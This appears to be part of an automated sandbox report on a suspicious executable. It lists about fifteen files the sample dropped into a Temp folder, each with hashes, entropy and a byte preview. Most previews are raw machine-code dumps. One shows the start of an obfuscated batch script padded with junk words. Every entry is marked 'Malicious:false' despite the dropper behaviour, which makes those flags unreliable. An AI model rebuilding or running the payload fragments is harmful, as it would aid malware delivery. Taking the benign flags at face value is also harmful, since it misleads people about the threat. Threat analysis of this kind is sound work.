                                  SHA-256:287BD4F2638DE14B77BA2651BB11C9DBCCF7FAD1563B177B99333CE8C0EA111A
                                  SHA-512:4CD11214D5FDC56CA64B8CAD7C2146A6185FC5CBB4348F19E9E244B773EFF8492A417E9767D94268675613AD02D7F32090BCEE284320AA168E5560FD4B6D1EB7
                                  Malicious:false
                                  Preview:u.j..,...]...U...u..u.j......]...U...u..u.j......]...U...u..u.j.....]...U...u..u.j.....]...U...u..u.j.....]...U...u..u.j....]...U...u..u.j....]...U...u..u.j....]...U...u..u.j..x...]...U...u..u.j..d...]...U...u..u.j..P...]...U...u..u.j..<...]...U...u..u.j..(...]...U...u..u.j......]...U...u..u.j......]...U...u..u.j.....]...U...u..u.j.....]...U...u..u.j.....]...U...u..u.j....]...U...u..u.j....]...U...u..u.j....]...U...u..u.j..t...]...U...u..u.j..`...]...U...u..u.j..L...]...U...u..u.j..8...]...U..E..M.SVQ.@....j...P....u.....k.....t..E.j...X...&.3.@.F.3.^[]...U..E.VW.@....'...P.....u......(....>3._.F.....^]...U....QSV.u.W....^...t..F.............v..N..I.........u.P..j..D$.PW.....|$.........t..M.V....V..Y..Y...u....-...F......>_^3.[..]...U.. ....z..SV.u.3.W3.M.E..~....v..F..H..N.....E....v..F..H..9..............R.U.f.......N.R.U.R.1.U.I.R.U.RSP.....P.......P.......uC.u.....,...M.3..&.G.~....P..|....D..t..@8.x..|....D..t..@8.@........M.3.G;.u.......P......

                                  C:\Users\user\AppData\Local\Temp\Gays

                                  Download File
                                  Process:C:\Users\user\Desktop\hfi47s4wOT.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):180
                                  Entropy (8bit):4.666148532319798
                                  Encrypted:false
                                  SSDEEP:3:esRrTg7NUqt/vllpfrYZcFTS9gXeF+X32ZpvX66yscucKN:xsiqjvVg3F+X32Cxscu7N
                                  MD5:FFDEBD6888A7BED21EEC8E9A96D0D105
                                  SHA1:6D976D433DD62242E0D298DBE655425678EB4B57
                                  SHA-256:7CCD2BB794ECFFE196F53105D62996728678DB56A364DB64DEC1CD544F8E6B7D
                                  SHA-512:D37A220781749A75A0CE5D8A1EF4558086C1ED317D4D47F67FD18032898E22E4E98138DC89A384F287BA4DDB1AC3208BAE67A3735C7A31F3F9BE9510E77F5E26
                                  Malicious:false
                                  Preview:COALITIONFIBERRELPASTE..MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........;...h...h...h4;mh...h4;oh

                                  C:\Users\user\AppData\Local\Temp\Grave

                                  Download File
                                  Process:C:\Users\user\Desktop\hfi47s4wOT.exe
                                  File Type:DIY-Thermocam raw data (Lepton 3.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 144115188075855872.000000
                                  Category:dropped
                                  Size (bytes):65536
                                  Entropy (8bit):5.0425034960307284
                                  Encrypted:false
                                  SSDEEP:768:6GMAGWRqA60dTct4qNn2fhRE9PfKj+wsxyLtVU:7Maj6iTcohiPfKj+wsxZ
                                  MD5:13B6BC1CD29589C3574FE2C6FD439F4D
                                  SHA1:6D8B9B516226DA45F2CBA7B0A2F0FD1E7DA33C7F
                                  SHA-256:B22A0E84A14C1CD50B72B3A02523B288693308ED38EA5CD796EDE737166FAB5E
                                  SHA-512:66C6B5B6256B78F3E22E40BA8446392C4FF40EF68E4B6391F755177D15605F868FFEBB410E5B3B3D59EF32487FF02C97060AECB8C357EF74476DDF10C4E861CA
                                  Malicious:false
                                  Preview:1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.m.......................................................r.r.r.r.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.3.3.3.3.r.r.r.r.r.r.r.r.r.r.r.r.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.5.4.4.4.4.4.4.4.4.5.r.r.r.r.r.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.7.7.7.7.7.r.r.r.r.r.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.r.9.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.r.r.r.r.:.:.:.:.:.:.:.:.;.<.<.<.<.<.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.r.r.A.A.A.A.A.A.A.A.A.A.r.r.r.r.r.r.r.r.

                                  C:\Users\user\AppData\Local\Temp\Inclusive

                                  Download File
                                  Process:C:\Users\user\Desktop\hfi47s4wOT.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):23552
                                  Entropy (8bit):6.4976960206227306
                                  Encrypted:false
                                  SSDEEP:384:tetETxTUA7Mw045OTMiwsSPvesgEIQA+oCdWS2uawpko/Rm4dz53KWefCFpSOcom:tetEOA5p5yMiwsSX1UxoWS2u5my3L6WK
                                  MD5:075BDC75CD071B39436C035608F4FA3B
                                  SHA1:F8F90B381A18100C86DA1DB3779BCE7FDBC49C3B
                                  SHA-256:4AEA3BBA0BBF5BDEAA4C4C3700DFD5E0380EDC6F246BFEE7C9816B43CB2CEF48
                                  SHA-512:4987F8A9347A63568C94782106445C65D5BF5056BCFC7AE33C583DEB21B7F935D4ECDB54E3D14521ABAEDCA6FFFCAE84CB517EBC729E2834596FAEB40F2E9DE9
                                  Malicious:false
                                  Preview:.@..h@.L...L..Y.L$.;.u\..t..T$..@.L.+.......0f;.\$..]..t$..t$.u!......u.3...u$.6..L.I........z....D$.f9D$......@..h`.L..K..Y.L$.;.uM..t..T$..`.L.+...4....f;.t$..t$..\$..].u.......u.3...u.j.._.D$.f9D$......@..hp.L..:K..Y.L$.;.uT..t/.T$..p.L.+.T$...0.....t$.f;.t$.u .T$.......u.3...u.j.....*.......f;T$......@...L..L$..4.....t..D$...P.-+..........L..L$........t.3..CS.........|......H..|9...D9.t..@8.X..O.....L..L$........t.j...............L..L$.......t!.E..@..p....{...v..L$..3 ..........L..L$..~.....t..E..@..H..q...P... .......0.L..L$..Q.....t..E..@..p....U{...L$..D$.P.v... ......z........P.L..L$........t....8!...7....p.L..L$........t..E..@..H.....P...c#...&......L..L$........t..D$(..P.b!.........L..L$.......t!.E..@..p....z...v..L$..,"..........L..L$..p.....t&........u.3........l....F...............L..L$..8.....t.j......L..L$..".....t.j............ .L..L$........t..D$(..P...........@.L..L$........t.j.j.h.....6..H.I....&.`.L..L$.......t)j.j.h.....6..H.I..p........C...

                                  C:\Users\user\AppData\Local\Temp\Layers

                                  Download File
                                  Process:C:\Users\user\Desktop\hfi47s4wOT.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):18432
                                  Entropy (8bit):6.551890576131227
                                  Encrypted:false
                                  SSDEEP:384:v99yFWs4Jaf8UNk67yfHzr3U4ZIRMxgldGeI0aBpmbPjuG9MNYU:vrUL4g8Z/ff33ZIOiILuTjuGO
                                  MD5:60FEE4C837F9DB364DB458E836D1C77B
                                  SHA1:A1CE120E31A00E863C1FA0A9A580DF757BE66D07
                                  SHA-256:E5A884C2668961712E1626561AFB98F25BD61026E10F0F29F30046B44B7797B3
                                  SHA-512:257E6E747E3C583A18FA3977A1A3E0ECA74D9AE58AF4B8B146E620AE074BB972F6D602C0C1023F2AEB3FF678FDAA0A57FEF1C011878D55064A983A1FAEB02A5D
                                  Malicious:false
                                  Preview:.............A;.u..tL..ss..............C.......1....................j.P......h....P..............3.3....k....AG............;...........................3.j.Y.................m.....&v.j&X....f!J...4.g!J............W..1............j.P..i.......P..........d!J....`.J.P........P.S........3.A...;...............u.3.............P..........;.u.........t.3.3......................F..;.u..tO........ss..............C.......43......SP............h....P......._.......................;...........................P......P......SP........3...u.P..................PS..........@......;...............3.3......................F..;.u......;...........uy..........................u.........3.3...\...9.............`...+.............`...........u%;.......!..`....V...\..............3.3..................stS;.u....`....@...\...............................`............@A..........\...;.u...t4..s......;.u....`.....A...\.....3....`.....\.....A...s............F;.....................P..`...Ph..........P.A

                                  C:\Users\user\AppData\Local\Temp\Mask

                                  Download File
                                  Process:C:\Users\user\Desktop\hfi47s4wOT.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):54272
                                  Entropy (8bit):6.617182259015394
                                  Encrypted:false
                                  SSDEEP:1536:cY5RrVGyanwUhhNpis3aUQzQpOQ2qJdpnVwNxF57:cY5tVGvH7fsUQwHJJX4xF57
                                  MD5:93D8F8835F8D0909A3C3D9D5B38576DD
                                  SHA1:318D86B0E53EBDD3BAE3E8B63BC520C23172672E
                                  SHA-256:AA9261520C99B5E095462E233F15F96245ADB022022E92BDBE1470238AA773C9
                                  SHA-512:4BDDFC440B14AEC336251142A120BB7E1C74B74B057250EBD9167AE6B7805EFFDB8270E816F41B9BC3B6117BD3B6F5433C11ECC96D2EC365C0605C2749E1EFDB
                                  Malicious:false
                                  Preview:.t.2....M..E..M..M..E.f.E.f........U..QSVW...M.......u.3.].9.v#.E...P......t..u..M..E...V...C;.r...._^[.....E...u...U..QSV..M.W.....j.2._.E...P.:.....tGf.}....t.f9}.t/.u..M........E...P.......t.f9}.t.j.j.j....1....._^[......u.2...VW..3.F.O...;.~=SHj..../..Y.0._..G...u.j.X...C....P.G../..S.7..V.?......7[_^.U....SV..M.......u..E...P.Z.....t..U..M........2.M......^..[....U..QQSV.5..I..E.Wj.3..PSS.7._.._...O.+M..G..E.j.SPQ.7..j..E.PSS.7..E..G..E..G._^[..U..QQSW....3.E.QQ.x.QQGW.0Qh........I..E...u.....+...7VP....Y3...E.QQ.u.VW.0Qh........I.HPQV...X(..V....Y^_[..U..QV..W3.9~.t..~..~......W.E.P.u..u..6....I..E..F..~._^....U..E.V.p.V.0....;.^...]...U....SVW...G,...td...t_...tN...tI...t....t..M..?....M..U..K'.....M..*....M..U.......E..P.....M.......!.u.."........E..p...V.0.!...;...._^..[....U.....E.SVW.p..8..V.M..n-..YP.M..oe...].3..t...+.G...9......D.....;.r.M.VS......M.;.....E..).u.j.Q..,..S."-...E...._^[....U..V..f...F......H..j...,..Y.M.......^]...U....SV.

                                  C:\Users\user\AppData\Local\Temp\Mcdonald

                                  Download File
                                  Process:C:\Users\user\Desktop\hfi47s4wOT.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):63488
                                  Entropy (8bit):6.6522258512540935
                                  Encrypted:false
                                  SSDEEP:1536:nIi7Q6YxIjZYVVSoNd6sqII0RAuTtCHaVejoaLjzZU6i5Hf:nz5YaZYvlfA6Gfza6ix
                                  MD5:75310FB192A747CAD5C01E1F3FF4A14D
                                  SHA1:71465DD1F6B2288AE3C4B6FD37DBCACD512C0D9D
                                  SHA-256:50CB742ABD64DE0C3401B8E6926EB7299E3A31ABCDEDA4A250B7C8A8572CF16D
                                  SHA-512:7CFED7208C370291568D6CECD0486B87E306D163DADFC3C64A4A5A5CC8ABE08B0FEA3FE343A10B0F217449AE4DCC2266FA93C5E4D810CA6F2C11FEFDA6115FA7
                                  Malicious:false
                                  Preview:....7....K......8.......0.....C...C..........{......3.9B..........K.....+......}r......f;.w................]..U..}..M.."........;...C.....n......wf.K....f;E.t.f;E.t.f;E.t.f;E...2...jw_..A...Af99t..u..}.....u.R.u..U................... 1L..U...C.z....U.E.P.E....p........].YY.........u..>...u..}..U..F..U....U......%....E..u....Z..E...n..p..........G......|........E..$...E.....;...b...........u..........;.t..........u.....3.......P.r.......YY.........k...........b....E..@..........0.........E................E..@..........0..........................E..@..................E..@...................E..@.............p....E..@..........;.w/..U........L..... ..C...........7..........]...... ....x...... ........../ .........._ ........."........;.w/..@........7..... .............."................. ........... ........../ .........._ ..........................x........;...k.....' ..........) ....S............E.................;.................. ....v...ot,..........E.;.U.t..U.

                                  C:\Users\user\AppData\Local\Temp\Microphone

                                  Download File
                                  Process:C:\Users\user\Desktop\hfi47s4wOT.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):68608
                                  Entropy (8bit):6.578891271109468
                                  Encrypted:false
                                  SSDEEP:1536:8vTZsv5sjBz/bxvMz+LcArlNUE9TjFq9iOIXyTsJ0Oetj0EJ5M6:8LNBPcAvPTjFq9iOIXyTw0ltj0Eo6
                                  MD5:32960DC42512C628A1DD1303BA00E765
                                  SHA1:BEE0D877E728B631442E4C768AB634F9E8FF8552
                                  SHA-256:78523D6E48A5343C653BBBF36303D4CB147DDC98E6A6B6E027E43F2C78AB86B3
                                  SHA-512:BF2E3613120DDDE0BE8C3B04A2964E5226F2FD75E9394E35E63591B8541B6EC8450DC190943DBF03CC52A7BD1A6CDC2A0453D0241A86DC869940F06AD39FDC95
                                  Malicious:false
                                  Preview:...I....Q...Z..J...t...t..I8.A.........t..I8.A......z...B.t..@8.@......I._^3.[..]...U..E.SVW.@....0...(....^..C...u..5|#M.....I.....I........E....Pj.....I.....uE.u.........&..F........H..|9...D9.t..@8.@......|9...D9.t..@8.@......V....I...u0.u........&..F........H..|9...D9.t..@8.@.......3P..W..YYV....I..5|#M.....I.....I.Vj.....I...u;.u....7....&.3.B.V....H..|9...D9.t..@8.P..|9...D9.t..@8.@......I._^3.[]...U..E.VWj..@..0.4.......w....u...Y........>3._.F.....^]...U..QQVWh.........YP.M...B...}.3.f...E..@..0......F.h....W.0....I..M..E.P.v....E..(.u.j.P.J...W......._3.^....U..S.].VW.{...s.r..v....0....F..8.C..0.......W...6.......j..F..0....I..u...........>3._.F.....^[]...U..QW.E...Ph....j.h.~L.j.j.h......X.I...u=V.u........&.3.B.V...^.H..|9...D9.t..@8.P..|9...D9.t..@8.@..3._....U.....E..e..VW.@....0...]....V..M...E.B..E..B..E.B..E....b....u..u.....I..E.P.......t.j..E.P.E.P.[....M.P.3....9...H..|9...D9.t..@8.@......|9...D9.t..@8.M.h..I..@....b...M...._3.^....U........E.SV3..

                                  C:\Users\user\AppData\Local\Temp\Natural

                                  Download File
                                  Process:C:\Users\user\Desktop\hfi47s4wOT.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):60416
                                  Entropy (8bit):6.789905457970087
                                  Encrypted:false
                                  SSDEEP:1536:8o2+9BkxXiblenlJJyIE2UWb/hoQZ2OEW:8NogXJ3i2Umb2OH
                                  MD5:6D1BA42C8C61EBD6D251045113DDB4FA
                                  SHA1:B4834F5EDB47DF441D1241FB0161B047709288EF
                                  SHA-256:9A31C0765710A009D1EB550F7E9D6FDB5F137F1296D551DEF9568B4076DFC6BF
                                  SHA-512:6E95B0577F5E037F497CB51FB4AAD7CE191ACC560591E6C071DE38C53BF80AB404222F8B8EAA6AE7FAF83078DAA0C1A80E42CF92FCDA77E4D22C2BCEDD2CF529
                                  Malicious:false
                                  Preview:.D.]DF.M8wBK...]i...WO.dln.U.V..;...0.:2...g~U....5....z..T.$"_...0........!..........z.|...Gv...K7..7..R*...4...7.D"....?Dd..I......{..L......"...|..|&...|.P.;..n..nc......d2Y. .#......H$.i.......q7....h.......:K.=...;....<wt....;...T.O...8"...<..".S....n....:/.1...3,..<K.hk...H'O..k.......'..kK.@...".+......V7.vq...M1...Y.6Bg..G.vqb_7.P...I.....!.H8...7.\..T.?.....>.b.L./.7/_..t..w$......(.91.@g.m..6.....O..._.....fw..o...Z...,......~m..../U.. R..>.......N4Lq...W...$..K...+,..].m..m......Rf.H.Zy.H?.x+/..d|....[.=..'.uspg.q...BU..a..i........|>hY.q..-.y.h.M.R...\......E,.c.f.i..z.|.....Q.u...KU....g..+.X...E..4b.Xq~~.e.4.HD".17..6.~.]=...=.0o.X`6....A...B:.....vw.j(....t..Y..r2.t-..z$~ii..0...~...(oH.6...f..va.7o.^.x...h.......n...]...B/....I&....e#<.\.g.?.....t5.u}..Je..Z.....S.x..F..g.....^F......f...."......OS..@6...S.o.Hw#....UN^....Yr+...4....Z8.+..]t5h...N...|&.H4....qii),"..._.2...Ke.+.Y.\.....V.K^...s>.C...Hqh(..D#..Q.....I&..Su.pR9.\...

                                  C:\Users\user\AppData\Local\Temp\Original

                                  Download File
                                  Process:C:\Users\user\Desktop\hfi47s4wOT.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):36864
                                  Entropy (8bit):6.509701430251635
                                  Encrypted:false
                                  SSDEEP:768:09+rdQLnBb2xXLDNxFch4Au5/RUIDn1hGNfgN/ROqVlHBjL0:09+knILDTpiAh2QOSlh30
                                  MD5:0A083D1777BF8842547AF4D1352264C7
                                  SHA1:89C4CC4D0B1B83C05D0C3452F1BD3A91432BF108
                                  SHA-256:4BCF0304B5EFE58772FEF5945104D24FF011288E375FEF04637A11DB8FFE5AFC
                                  SHA-512:95CCF811757A99A35333300D849B4B7BC8AC31AE4BB61B033197572DC25937863579C7744BF893A4A909DFDACA49425A37E3464EF483A01196B49C98C1422BD0
                                  Malicious:false
                                  Preview:...u(..x(j.Y.J,.!....B0.3...3.A..j...j...j...j...j...3....t....t....t..j..~...j..w...U..SV.u...W.}...........u.VW...K.....t._^[]........D....u.VW...B....u.3..t...9A..t.;.r.3.@..;.t.3........U..QSV.u.3..M...W..t..}...8@..tJ...w.;.r..tD....._^[..]....J>..........J ....................._^3.[..]....9.u.........r...<.......<.......j.X;.r..9.......3..U..VW......E...........3.Vh....j.Vj.h.....E..0....I....?._...^]...U.......SVW..3..M.h..I..D$.......}.....u".G..H..Y.....t$...................G....x..../...j8.......$.....'....Y..G..A....O..9O.....2....E..@..0...P....v...............PV.G(.........E......q................G(...]...h.....L$......t$.2..D$..........._....d$....~).D$...P.D>...........D$.@.D$.;.|.D$...u..M..D$.P.....E..@....x..u....f.....t.Q...*....L$..vL.._^3.[..]...U...u..u.j......]...U......L.E.3.L$ B.M.SV3.T$8.q.!\$.!\$4W.t$.3.....t$ .t$(.t$$.t$..t$..t$0.....T......w....}a@..$.Ia@.........D$..S.;........S.;..."....S.;.v..E..H.....W...D$ .D$..S.;.v..E..H.

                                  C:\Users\user\AppData\Local\Temp\Plus

                                  Download File
                                  Process:C:\Users\user\Desktop\hfi47s4wOT.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):51200
                                  Entropy (8bit):6.6194287801968725
                                  Encrypted:false
                                  SSDEEP:1536:pDZcBMHa9kV6t1LWmVsRmOu3OAOvHZnR2Uf9A:pLaLWysRIO7vHZnBfe
                                  MD5:6FD2F7B6CC7586FEAD055037C40712EE
                                  SHA1:A4DD8FDB49A624C2944EC9D27121525DCC732009
                                  SHA-256:C7B1647A177F33E3F4C279746A575EA75998D193E3F91C80042EEE5B29E5D1A4
                                  SHA-512:3DBE53F2B71B3264214052183F831BA38D1B30079E5E771C1866E71679D7D77BA42C771912860698F4576100916AE06B318F46D04EA3231EF3DA6639E64C9C82
                                  Malicious:false
                                  Preview:........E.9E.......;~|.............U..t*..%....=....u.............%..............R.U.............E....E....E.@P.u...V.u..u...........z....<................;.......;......;................;......#................;...........E...}.@P.u...V.u..u.................E.9E........E....F|+.;.w.Q.u.W..=.......u..E..4.E.....Q.......F|+.;...A...Q.E.PW..<.........+....E..E.<G.E...@..P.u.V.u..u..x..........r....3....E...}.@P.u...V.u..u..M...............E.;E......;~|.........9M.t.9M......@....E..E...@P.u.V.u..u...........t.....E...@..P.u.V.u..u.................M.;M...k...;~|............9E...S....E.A@.M.P.u....V.u..u.........t..M....E...}.@P.u...V.u..u..g.......}.................U.;U......;~|..............%....=....u.............%..............9M.......9M........E.B@.U.P.u....V.u..u..........t.............E.;E...h...;~|.........9M...S...9M...J...@....E..E...@P.u.V.u..u.........t..A................;............Fh.....................E...}.@P.u...V.u..u..).......}..t~....

                                  C:\Users\user\AppData\Local\Temp\Returning

                                  Download File
                                  Process:C:\Users\user\Desktop\hfi47s4wOT.exe
                                  File Type:ASCII text, with very long lines (605), with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):9279
                                  Entropy (8bit):5.093662762633714
                                  Encrypted:false
                                  SSDEEP:192:xtNo7ixpSldvvWQtwj0lma3K1nJDcW2XGZV3PAvky3LRfoe+uqNW:GinAvgwlmL1nJDCXGZBPUka1uM
                                  MD5:4149C73BF7688A9F28B37B4C8C7470B4
                                  SHA1:86F0DB42DF2C15609623412351C5D8DF5948B6F0
                                  SHA-256:4325903BC11B2F84611A6FE5493AA741809322136D71334CA01C84BE1578B274
                                  SHA-512:2DB401EF91C468619F2907B3931F40CFAD0F7EB3D443A0456E14AEC0EE22DC932C924A65C4329B447C38B83A0018126627E253FC4074FDE5E9CD285F7DB74579
                                  Malicious:false
                                  Preview:Set Videos=y..CcVolunteers Calculations Antique ..FEHomes Planet Mask Ring Tension Equal ..bOENLogged Experiments Excessive Heart Harmful Cradle Involving Colleague ..uyDocumentary Walked Powers Downloadable Browse ..JxNtTactics Sanyo Opening Challenges Gilbert Independent Parts Coalition Cargo ..LUVQualify Ozone Strengthening Cashiers Heaven Mining ..CZTribute Operating Quotes Exterior Saved ..zrvzOutlet Scan Automobile Beat ..bXYoBahrain Rob Outlet Hair Fraser ..Set Sleep=s..AHdCalculators Currently Revisions Rebecca Ever Gods December Adobe ..bBlStep ..eJuaSpring Valium Steady Structured Begun Trust ..tuMRegions Built Steady Persons Stand Expanding Zdnet Cameras Midnight ..iUGkExchange Lighter Analyst Consistency ..xfMCommunist Garage Timing Parliament Goto Watching Childrens Texts Touch ..Set Love=h..jlRecorded Premises Wx Scale Sport Profiles Anyone Cuts Organised ..FUeBean Lodge Inch Genuine Tomorrow Jam Iraq Hiking Fog ..EEhZHq ..tdtWage Hampton Leisure Threads Demand ..igSaturn

                                  C:\Users\user\AppData\Local\Temp\Returning.cmd (copy)

                                  Download File
                                  Process:C:\Windows\SysWOW64\cmd.exe
                                  File Type:ASCII text, with very long lines (605), with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):9279
                                  Entropy (8bit):5.093662762633714
                                  Encrypted:false
                                  SSDEEP:192:xtNo7ixpSldvvWQtwj0lma3K1nJDcW2XGZV3PAvky3LRfoe+uqNW:GinAvgwlmL1nJDCXGZBPUka1uM
                                  MD5:4149C73BF7688A9F28B37B4C8C7470B4
                                  SHA1:86F0DB42DF2C15609623412351C5D8DF5948B6F0
                                  SHA-256:4325903BC11B2F84611A6FE5493AA741809322136D71334CA01C84BE1578B274
                                  SHA-512:2DB401EF91C468619F2907B3931F40CFAD0F7EB3D443A0456E14AEC0EE22DC932C924A65C4329B447C38B83A0018126627E253FC4074FDE5E9CD285F7DB74579
                                  Malicious:false
                                  Preview:Set Videos=y..CcVolunteers Calculations Antique ..FEHomes Planet Mask Ring Tension Equal ..bOENLogged Experiments Excessive Heart Harmful Cradle Involving Colleague ..uyDocumentary Walked Powers Downloadable Browse ..JxNtTactics Sanyo Opening Challenges Gilbert Independent Parts Coalition Cargo ..LUVQualify Ozone Strengthening Cashiers Heaven Mining ..CZTribute Operating Quotes Exterior Saved ..zrvzOutlet Scan Automobile Beat ..bXYoBahrain Rob Outlet Hair Fraser ..Set Sleep=s..AHdCalculators Currently Revisions Rebecca Ever Gods December Adobe ..bBlStep ..eJuaSpring Valium Steady Structured Begun Trust ..tuMRegions Built Steady Persons Stand Expanding Zdnet Cameras Midnight ..iUGkExchange Lighter Analyst Consistency ..xfMCommunist Garage Timing Parliament Goto Watching Childrens Texts Touch ..Set Love=h..jlRecorded Premises Wx Scale Sport Profiles Anyone Cuts Organised ..FUeBean Lodge Inch Genuine Tomorrow Jam Iraq Hiking Fog ..EEhZHq ..tdtWage Hampton Leisure Threads Demand ..igSaturn

                                  C:\Users\user\AppData\Local\Temp\Rome

                                  Download File
                                  Process:C:\Users\user\Desktop\hfi47s4wOT.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):12288
                                  Entropy (8bit):3.2170650553058415
                                  Encrypted:false
                                  SSDEEP:192:PQwPzQ0xMi4JA48Pjh+NEpCaruj6HIKlhaYaffff:PQs1xaJ3WMygaruSIKlcYaffff
                                  MD5:C93568A14F88C45C58E04E6BA32934E5
                                  SHA1:A6BA2DE457D9AF61A9499EA79EDFC3DD7A1ADD08
                                  SHA-256:BD3EF3BEB9F2A37039793F731AE99F752123838E7E754E6B0117C4F443E442AB
                                  SHA-512:30359FD147BB35251D5F870FE2B89F414128BA94B587E2169C9B08FFFEBF859B8F79F12CDA6FB181FCB25483E28A936C4485190167C62CD70A08E0910E472EB8
                                  Malicious:false
                                  Preview:,.GetFocus....AttachThreadInput...GetWindowThreadProcessId..!.GetDC.e.ReleaseDC...GetWindowLongW....InvalidateRect....EnableWindow....IsWindowVisible...IsWindowEnabled...IsWindow..#.GetDesktopWindow....EnumWindows...DestroyWindow.K.GetMenu...GetClientRect...BeginPaint....EndPaint..U.CopyRect....SetWindowTextW..'.GetDlgItem..s.SendDlgItemMessageW...EndDialog...MessageBeep...DialogBoxParamW...LoadStringW.!.VkKeyScanW..=.GetKeyState.B.GetKeyboardState....SetKeyboardState....GetAsyncKeyState..v.SendInput.0.keybd_event...SystemParametersInfoW...FindWindowW...IsIconic....SetForegroundWindow.T.GetMenuItemInfoW....SetMenuItemInfoW..Q.GetMenuItemCount..R.GetMenuItemID.@.CheckMenuRadioItem....DeleteMenu.. .GetCursorPos....TrackPopupMenuEx....IsMenu....InsertMenuItemW...SetMenuDefaultItem....EnumThreadWindows...FindWindowExW...SetActiveWindow...ExitWindowsEx.1.mouse_event...LoadImageW....MonitorFromRect.-.CharLowerBuffW....UnregisterHotKey..8.GetInputState.3.PeekMessageW....TranslateMessage....Di

                                  C:\Users\user\AppData\Local\Temp\Rw

                                  Download File
                                  Process:C:\Users\user\Desktop\hfi47s4wOT.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):13312
                                  Entropy (8bit):6.541546615575386
                                  Encrypted:false
                                  SSDEEP:384:XGDe4tMq69MkcX/j4QOwU/sIo1OjXOsAtjp6aQ8UEGtM7S:URChcjDhU/RWEOrsaQ8UEdS
                                  MD5:86BA6159A4D2497C5A5EA47FE8B1C4C7
                                  SHA1:E029EF9EEF65E4FB1558E0C63B30785893BA9164
                                  SHA-256:340244BD89C4A6231769A64EB09C4DDA52CF73076DE09FFE778B115200FE2FB1
                                  SHA-512:650B93FF124259BB52F0884F4F1D418280635BF7FE0B4DA262423759D641990F0982E0C74AB15AD2A885F22D5CF0B064AAB14CA135970D7370188CCD13AEAEA6
                                  Malicious:false
                                  Preview:.h.....5H#M...#M...h.....5H#M...#M...3...#M.Vj.j.j.jc.5H#M.....I...H#M....#M..E.E.P...#M..E.0....E.#....u.u..M.}.]..u..E...I..U..E.x/@...$.I..5.#M.f.D#M..5.#M.Q.v..._^[..VW.5D.I.3.W.5H#M......WWjdh,...PPh.......I.PPW..W.5H#M..|#M.j.PWWWWh...PWh .I.W..5 .I.W.5|#M..x#M...W.5|#M..._^.U...@.H#M.V3..$)M.j..E.0....E.+....u..E......E.u...0.I..E.E..E..E..E.E.P.u..E...I..E..A...$.I.hH.I.f..#M.....I..()M..E.P.E......E.;.......I.j.j.j!j.j.....I.h.....5$)M..|)M...(.I.Pj..5|)M.....I..5.)M.^....SV.5..I.3.W..j.XS...G.f.G...._.._.._.._.j[.G.......Sj..G)..Sh.....G&..Sh.....G'..Sj..G(..Sj..G$..G%_^[.V..&..N..W...................................................E..j........$..I.. .......I..F...^.j..A.Z. ..@....u....3.3...@.A..Q..Q..Q..Q..A,...Q .Q(.Q0.U..W........;...Vj@....Y.u...........O..N8.w.^.._]...U..V.u.W..V.g...S....F..O .G..F..G..F..G..F .a..P.1....F0.G0.._^]...3....(M.d...3.f."%M.A.$%M.j...(%M...,%M...0%M..@%M.f..'M....&M....'M......X...'M..4%M..8%M...<%M..U...8.. $M.@.I.3....

                                  C:\Users\user\AppData\Local\Temp\Sail

                                  Download File
                                  Process:C:\Users\user\Desktop\hfi47s4wOT.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):21193
                                  Entropy (8bit):7.990963337849143
                                  Encrypted:true
                                  SSDEEP:384:CEHj11c9C5gj0zCiUJ9IGblXaca1glVib0ObNvAOa19KPCJq/Hda+is1X9:dD/ccgj4CiOblXaU7u0ObX1uq/DikX9
                                  MD5:CC0FE2ED3D76EE01E494372ED0A183AA
                                  SHA1:AD49973FD5E71A1F332286C96E68237472083C78
                                  SHA-256:D24DC334E63813E2062639F97DA8DAD785BB84F50572BD271686790CB300D59C
                                  SHA-512:BC4B54EB7B89DD8FB1B974D76EDADD9641D5BA43808D2C396D0FE5FA510C30F9A2157E1071207A16C0C4044501893E39BF19AC42ED6700CDE8D492A33A313080
                                  Malicious:false
